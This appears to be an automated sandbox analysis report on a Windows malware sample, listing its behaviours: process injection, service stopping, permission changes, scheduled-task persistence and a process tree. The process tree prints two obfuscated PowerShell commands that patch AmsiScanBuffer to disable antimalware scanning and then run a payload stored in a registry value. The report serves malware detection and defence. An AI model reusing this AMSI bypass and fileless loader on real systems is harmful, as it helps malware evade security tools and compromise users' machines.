Analysis
-
max time kernel
266s -
max time network
182s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
26-04-2022 22:17
Static task
static1
Behavioral task
behavioral1
Sample
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe
Resource
win7-20220414-en
General
-
Target
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe
-
Size
2.2MB
-
MD5
40caa9b00badca24594571e157a6d2a9
-
SHA1
42f2faf2aa59f38c16824eaa1dc022fddb142565
-
SHA256
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
-
SHA512
e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3696 created 3792 3696 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
powershell.EXEsvchost.exedescription pid process target process PID 3624 created 576 3624 powershell.EXE winlogon.exe PID 4004 created 3792 4004 svchost.exe DllHost.exe PID 4004 created 3772 4004 svchost.exe DllHost.exe PID 4004 created 3792 4004 svchost.exe DllHost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 4952 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4424 takeown.exe 4952 icacls.exe 4520 takeown.exe 4356 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4520 takeown.exe 4356 icacls.exe 4424 takeown.exe 4952 icacls.exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
conhost.exepowershell.EXEconhost.exedescription pid process target process PID 2692 set thread context of 2088 2692 conhost.exe conhost.exe PID 3624 set thread context of 4876 3624 powershell.EXE dllhost.exe PID 400 set thread context of 4068 400 conhost.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3268 3772 WerFault.exe DllHost.exe 1668 3792 WerFault.exe DllHost.exe 3696 3792 WerFault.exe DllHost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1651018720" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.EXEpowershell.EXEdllhost.exeWerFault.exeWerFault.exepid process 3768 powershell.exe 3768 powershell.exe 3768 powershell.exe 2692 conhost.exe 3624 powershell.EXE 3624 powershell.EXE 3624 powershell.EXE 1968 powershell.EXE 3624 powershell.EXE 4876 dllhost.exe 4876 dllhost.exe 1968 powershell.EXE 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 1968 powershell.EXE 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 1668 WerFault.exe 3268 WerFault.exe 3268 WerFault.exe 3268 WerFault.exe 3268 WerFault.exe 3268 WerFault.exe 3268 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3016 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exeWerFault.exeWerFault.exeExplorer.EXEpowershell.exedescription pid process Token: SeDebugPrivilege 3768 powershell.exe Token: SeIncreaseQuotaPrivilege 3768 powershell.exe Token: SeSecurityPrivilege 3768 powershell.exe Token: SeTakeOwnershipPrivilege 3768 powershell.exe Token: SeLoadDriverPrivilege 3768 powershell.exe Token: SeSystemProfilePrivilege 3768 powershell.exe Token: SeSystemtimePrivilege 3768 powershell.exe Token: SeProfSingleProcessPrivilege 3768 powershell.exe Token: SeIncBasePriorityPrivilege 3768 powershell.exe Token: SeCreatePagefilePrivilege 3768 powershell.exe Token: SeBackupPrivilege 3768 powershell.exe Token: SeRestorePrivilege 3768 powershell.exe Token: SeShutdownPrivilege 3768 powershell.exe Token: SeDebugPrivilege 3768 powershell.exe Token: SeSystemEnvironmentPrivilege 3768 powershell.exe Token: SeRemoteShutdownPrivilege 3768 powershell.exe Token: SeUndockPrivilege 3768 powershell.exe Token: SeManageVolumePrivilege 3768 powershell.exe Token: 33 3768 powershell.exe Token: 34 3768 powershell.exe Token: 35 3768 powershell.exe Token: 36 3768 powershell.exe Token: SeShutdownPrivilege 1552 powercfg.exe Token: SeCreatePagefilePrivilege 1552 powercfg.exe Token: SeShutdownPrivilege 4796 powercfg.exe Token: SeCreatePagefilePrivilege 4796 powercfg.exe Token: SeDebugPrivilege 2692 conhost.exe Token: SeShutdownPrivilege 3548 powercfg.exe Token: SeCreatePagefilePrivilege 3548 powercfg.exe Token: SeShutdownPrivilege 3444 powercfg.exe Token: SeCreatePagefilePrivilege 3444 powercfg.exe Token: SeDebugPrivilege 3624 powershell.EXE Token: SeDebugPrivilege 1968 powershell.EXE Token: SeDebugPrivilege 3624 powershell.EXE Token: SeDebugPrivilege 4876 dllhost.exe Token: SeAuditPrivilege 2468 svchost.exe Token: SeDebugPrivilege 1668 WerFault.exe Token: SeDebugPrivilege 3268 WerFault.exe Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeDebugPrivilege 4608 powershell.exe Token: SeIncreaseQuotaPrivilege 4608 powershell.exe Token: SeSecurityPrivilege 4608 powershell.exe Token: SeTakeOwnershipPrivilege 4608 powershell.exe Token: SeLoadDriverPrivilege 4608 powershell.exe Token: SeSystemProfilePrivilege 4608 powershell.exe Token: SeSystemtimePrivilege 4608 powershell.exe Token: SeProfSingleProcessPrivilege 4608 powershell.exe Token: SeIncBasePriorityPrivilege 4608 powershell.exe Token: SeCreatePagefilePrivilege 4608 powershell.exe Token: SeBackupPrivilege 4608 powershell.exe Token: SeRestorePrivilege 4608 powershell.exe Token: SeShutdownPrivilege 4608 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeSystemEnvironmentPrivilege 4608 powershell.exe Token: SeRemoteShutdownPrivilege 4608 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
dwm.exepid process 996 dwm.exe 996 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Conhost.exeConhost.exepid process 4412 Conhost.exe 2092 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2600 wrote to memory of 2692 2600 7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe conhost.exe PID 2600 wrote to memory of 2692 2600 7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe conhost.exe PID 2600 wrote to memory of 2692 2600 7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe conhost.exe PID 2692 wrote to memory of 4024 2692 conhost.exe cmd.exe PID 2692 wrote to memory of 4024 2692 conhost.exe cmd.exe PID 4024 wrote to memory of 3768 4024 cmd.exe powershell.exe PID 4024 wrote to memory of 3768 4024 cmd.exe powershell.exe PID 2692 wrote to memory of 4224 2692 conhost.exe cmd.exe PID 2692 wrote to memory of 4224 2692 conhost.exe cmd.exe PID 2692 wrote to memory of 4312 2692 conhost.exe cmd.exe PID 2692 wrote to memory of 4312 2692 conhost.exe cmd.exe PID 4224 wrote to memory of 2312 4224 cmd.exe sc.exe PID 4224 wrote to memory of 2312 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4164 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4164 4224 cmd.exe sc.exe PID 4312 wrote to memory of 1552 4312 cmd.exe powercfg.exe PID 4312 wrote to memory of 1552 4312 cmd.exe powercfg.exe PID 4224 wrote to memory of 4808 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4808 4224 cmd.exe sc.exe PID 4312 wrote to memory of 4796 4312 cmd.exe powercfg.exe PID 4312 wrote to memory of 4796 4312 cmd.exe powercfg.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 2692 wrote to memory of 2088 2692 conhost.exe conhost.exe PID 4224 wrote to memory of 4404 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4404 4224 cmd.exe sc.exe PID 4312 wrote to memory of 3548 4312 cmd.exe powercfg.exe PID 4312 wrote to memory of 3548 4312 cmd.exe powercfg.exe PID 4224 wrote to memory of 3536 4224 cmd.exe sc.exe PID 4224 wrote to memory of 3536 4224 cmd.exe sc.exe PID 4312 wrote to memory of 3444 4312 cmd.exe powercfg.exe PID 4312 wrote to memory of 3444 4312 cmd.exe powercfg.exe PID 4224 wrote to memory of 3380 4224 cmd.exe sc.exe PID 4224 wrote to memory of 3380 4224 cmd.exe sc.exe PID 4224 wrote to memory of 5012 4224 cmd.exe sc.exe PID 4224 wrote to memory of 5012 4224 cmd.exe sc.exe PID 2692 wrote to memory of 2948 2692 conhost.exe cmd.exe PID 2692 wrote to memory of 2948 2692 conhost.exe cmd.exe PID 4224 wrote to memory of 4716 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4716 4224 cmd.exe sc.exe PID 4224 wrote to memory of 3956 4224 cmd.exe sc.exe PID 4224 wrote to memory of 3956 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4256 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4256 4224 cmd.exe sc.exe PID 2948 wrote to memory of 60 2948 cmd.exe schtasks.exe PID 2948 wrote to memory of 60 2948 cmd.exe schtasks.exe PID 4224 wrote to memory of 1500 4224 cmd.exe sc.exe PID 4224 wrote to memory of 1500 4224 cmd.exe sc.exe PID 4224 wrote to memory of 1392 4224 cmd.exe sc.exe PID 4224 wrote to memory of 1392 4224 cmd.exe sc.exe PID 4224 wrote to memory of 3232 4224 cmd.exe sc.exe PID 4224 wrote to memory of 3232 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4508 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4508 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4500 4224 cmd.exe sc.exe PID 4224 wrote to memory of 4500 4224 cmd.exe sc.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{afbea32e-b76a-4261-8e32-3c483fb13cf4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:AQAEuKtwcFfh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HgITdvYnRhADiM,[Parameter(Position=1)][Type]$BzJmJWfoXQ)$RKwxxSdQpsN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$RKwxxSdQpsN.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$HgITdvYnRhADiM).SetImplementationFlags('Runtime,Managed');$RKwxxSdQpsN.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$BzJmJWfoXQ,$HgITdvYnRhADiM).SetImplementationFlags('Runtime,Managed');Write-Output $RKwxxSdQpsN.CreateType();}$aWDYVHgrilelS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$CWYIFbElrKLddB=$aWDYVHgrilelS.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EiQqLxgPwhXXxrhWSSa=AQAEuKtwcFfh @([String])([IntPtr]);$rTEzSssBlVGfnfgGZRESOD=AQAEuKtwcFfh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zppeKtqLXWb=$aWDYVHgrilelS.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$NQHqOOReNajvKJ=$CWYIFbElrKLddB.Invoke($Null,@([Object]$zppeKtqLXWb,[Object]('Load'+'LibraryA')));$dGDnLYoFfhEtLYKIf=$CWYIFbElrKLddB.Invoke($Null,@([Object]$zppeKtqLXWb,[Object]('Vir'+'tual'+'Pro'+'tect')));$WjZuMdi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQHqOOReNajvKJ,$EiQqLxgPwhXXxrhWSSa).Invoke('a'+'m'+'si.dll');$IvmFqhiRrOBULGdfL=$CWYIFbElrKLddB.Invoke($Null,@([Object]$WjZuMdi,[Object]('Ams'+'iSc'+'an'+'Buffer')));$LAdwyvylmQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGDnLYoFfhEtLYKIf,$rTEzSssBlVGfnfgGZRESOD).Invoke($IvmFqhiRrOBULGdfL,[uint32]8,4,[ref]$LAdwyvylmQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$IvmFqhiRrOBULGdfL,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGDnLYoFfhEtLYKIf,$rTEzSssBlVGfnfgGZRESOD).Invoke($IvmFqhiRrOBULGdfL,[uint32]8,0x20,[ref]$LAdwyvylmQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:owpfgqDwtXwS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GFozynMiHtDzXh,[Parameter(Position=1)][Type]$icWRvAwTSv)$tXkGNVaSgVm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$tXkGNVaSgVm.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$GFozynMiHtDzXh).SetImplementationFlags('Runtime,Managed');$tXkGNVaSgVm.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$icWRvAwTSv,$GFozynMiHtDzXh).SetImplementationFlags('Runtime,Managed');Write-Output $tXkGNVaSgVm.CreateType();}$swifuXmxvPTiB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$IAknHmghFKplPy=$swifuXmxvPTiB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sTvkclPIroMrynRftum=owpfgqDwtXwS @([String])([IntPtr]);$FGmLxDhDEcOZoOpGstrfsN=owpfgqDwtXwS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YOHaiUJyQqw=$swifuXmxvPTiB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$aNYSxVdyYcvtsi=$IAknHmghFKplPy.Invoke($Null,@([Object]$YOHaiUJyQqw,[Object]('Load'+'LibraryA')));$WgidwqCpSaKwoSWJE=$IAknHmghFKplPy.Invoke($Null,@([Object]$YOHaiUJyQqw,[Object]('Vir'+'tual'+'Pro'+'tect')));$mXoliQF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aNYSxVdyYcvtsi,$sTvkclPIroMrynRftum).Invoke('a'+'m'+'si.dll');$TlSUIlWfBjHZtYFLP=$IAknHmghFKplPy.Invoke($Null,@([Object]$mXoliQF,[Object]('Ams'+'iSc'+'an'+'Buffer')));$mzDSpZANhp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WgidwqCpSaKwoSWJE,$FGmLxDhDEcOZoOpGstrfsN).Invoke($TlSUIlWfBjHZtYFLP,[uint32]8,4,[ref]$mzDSpZANhp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TlSUIlWfBjHZtYFLP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WgidwqCpSaKwoSWJE,$FGmLxDhDEcOZoOpGstrfsN).Invoke($TlSUIlWfBjHZtYFLP,[uint32]8,0x20,[ref]$mzDSpZANhp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
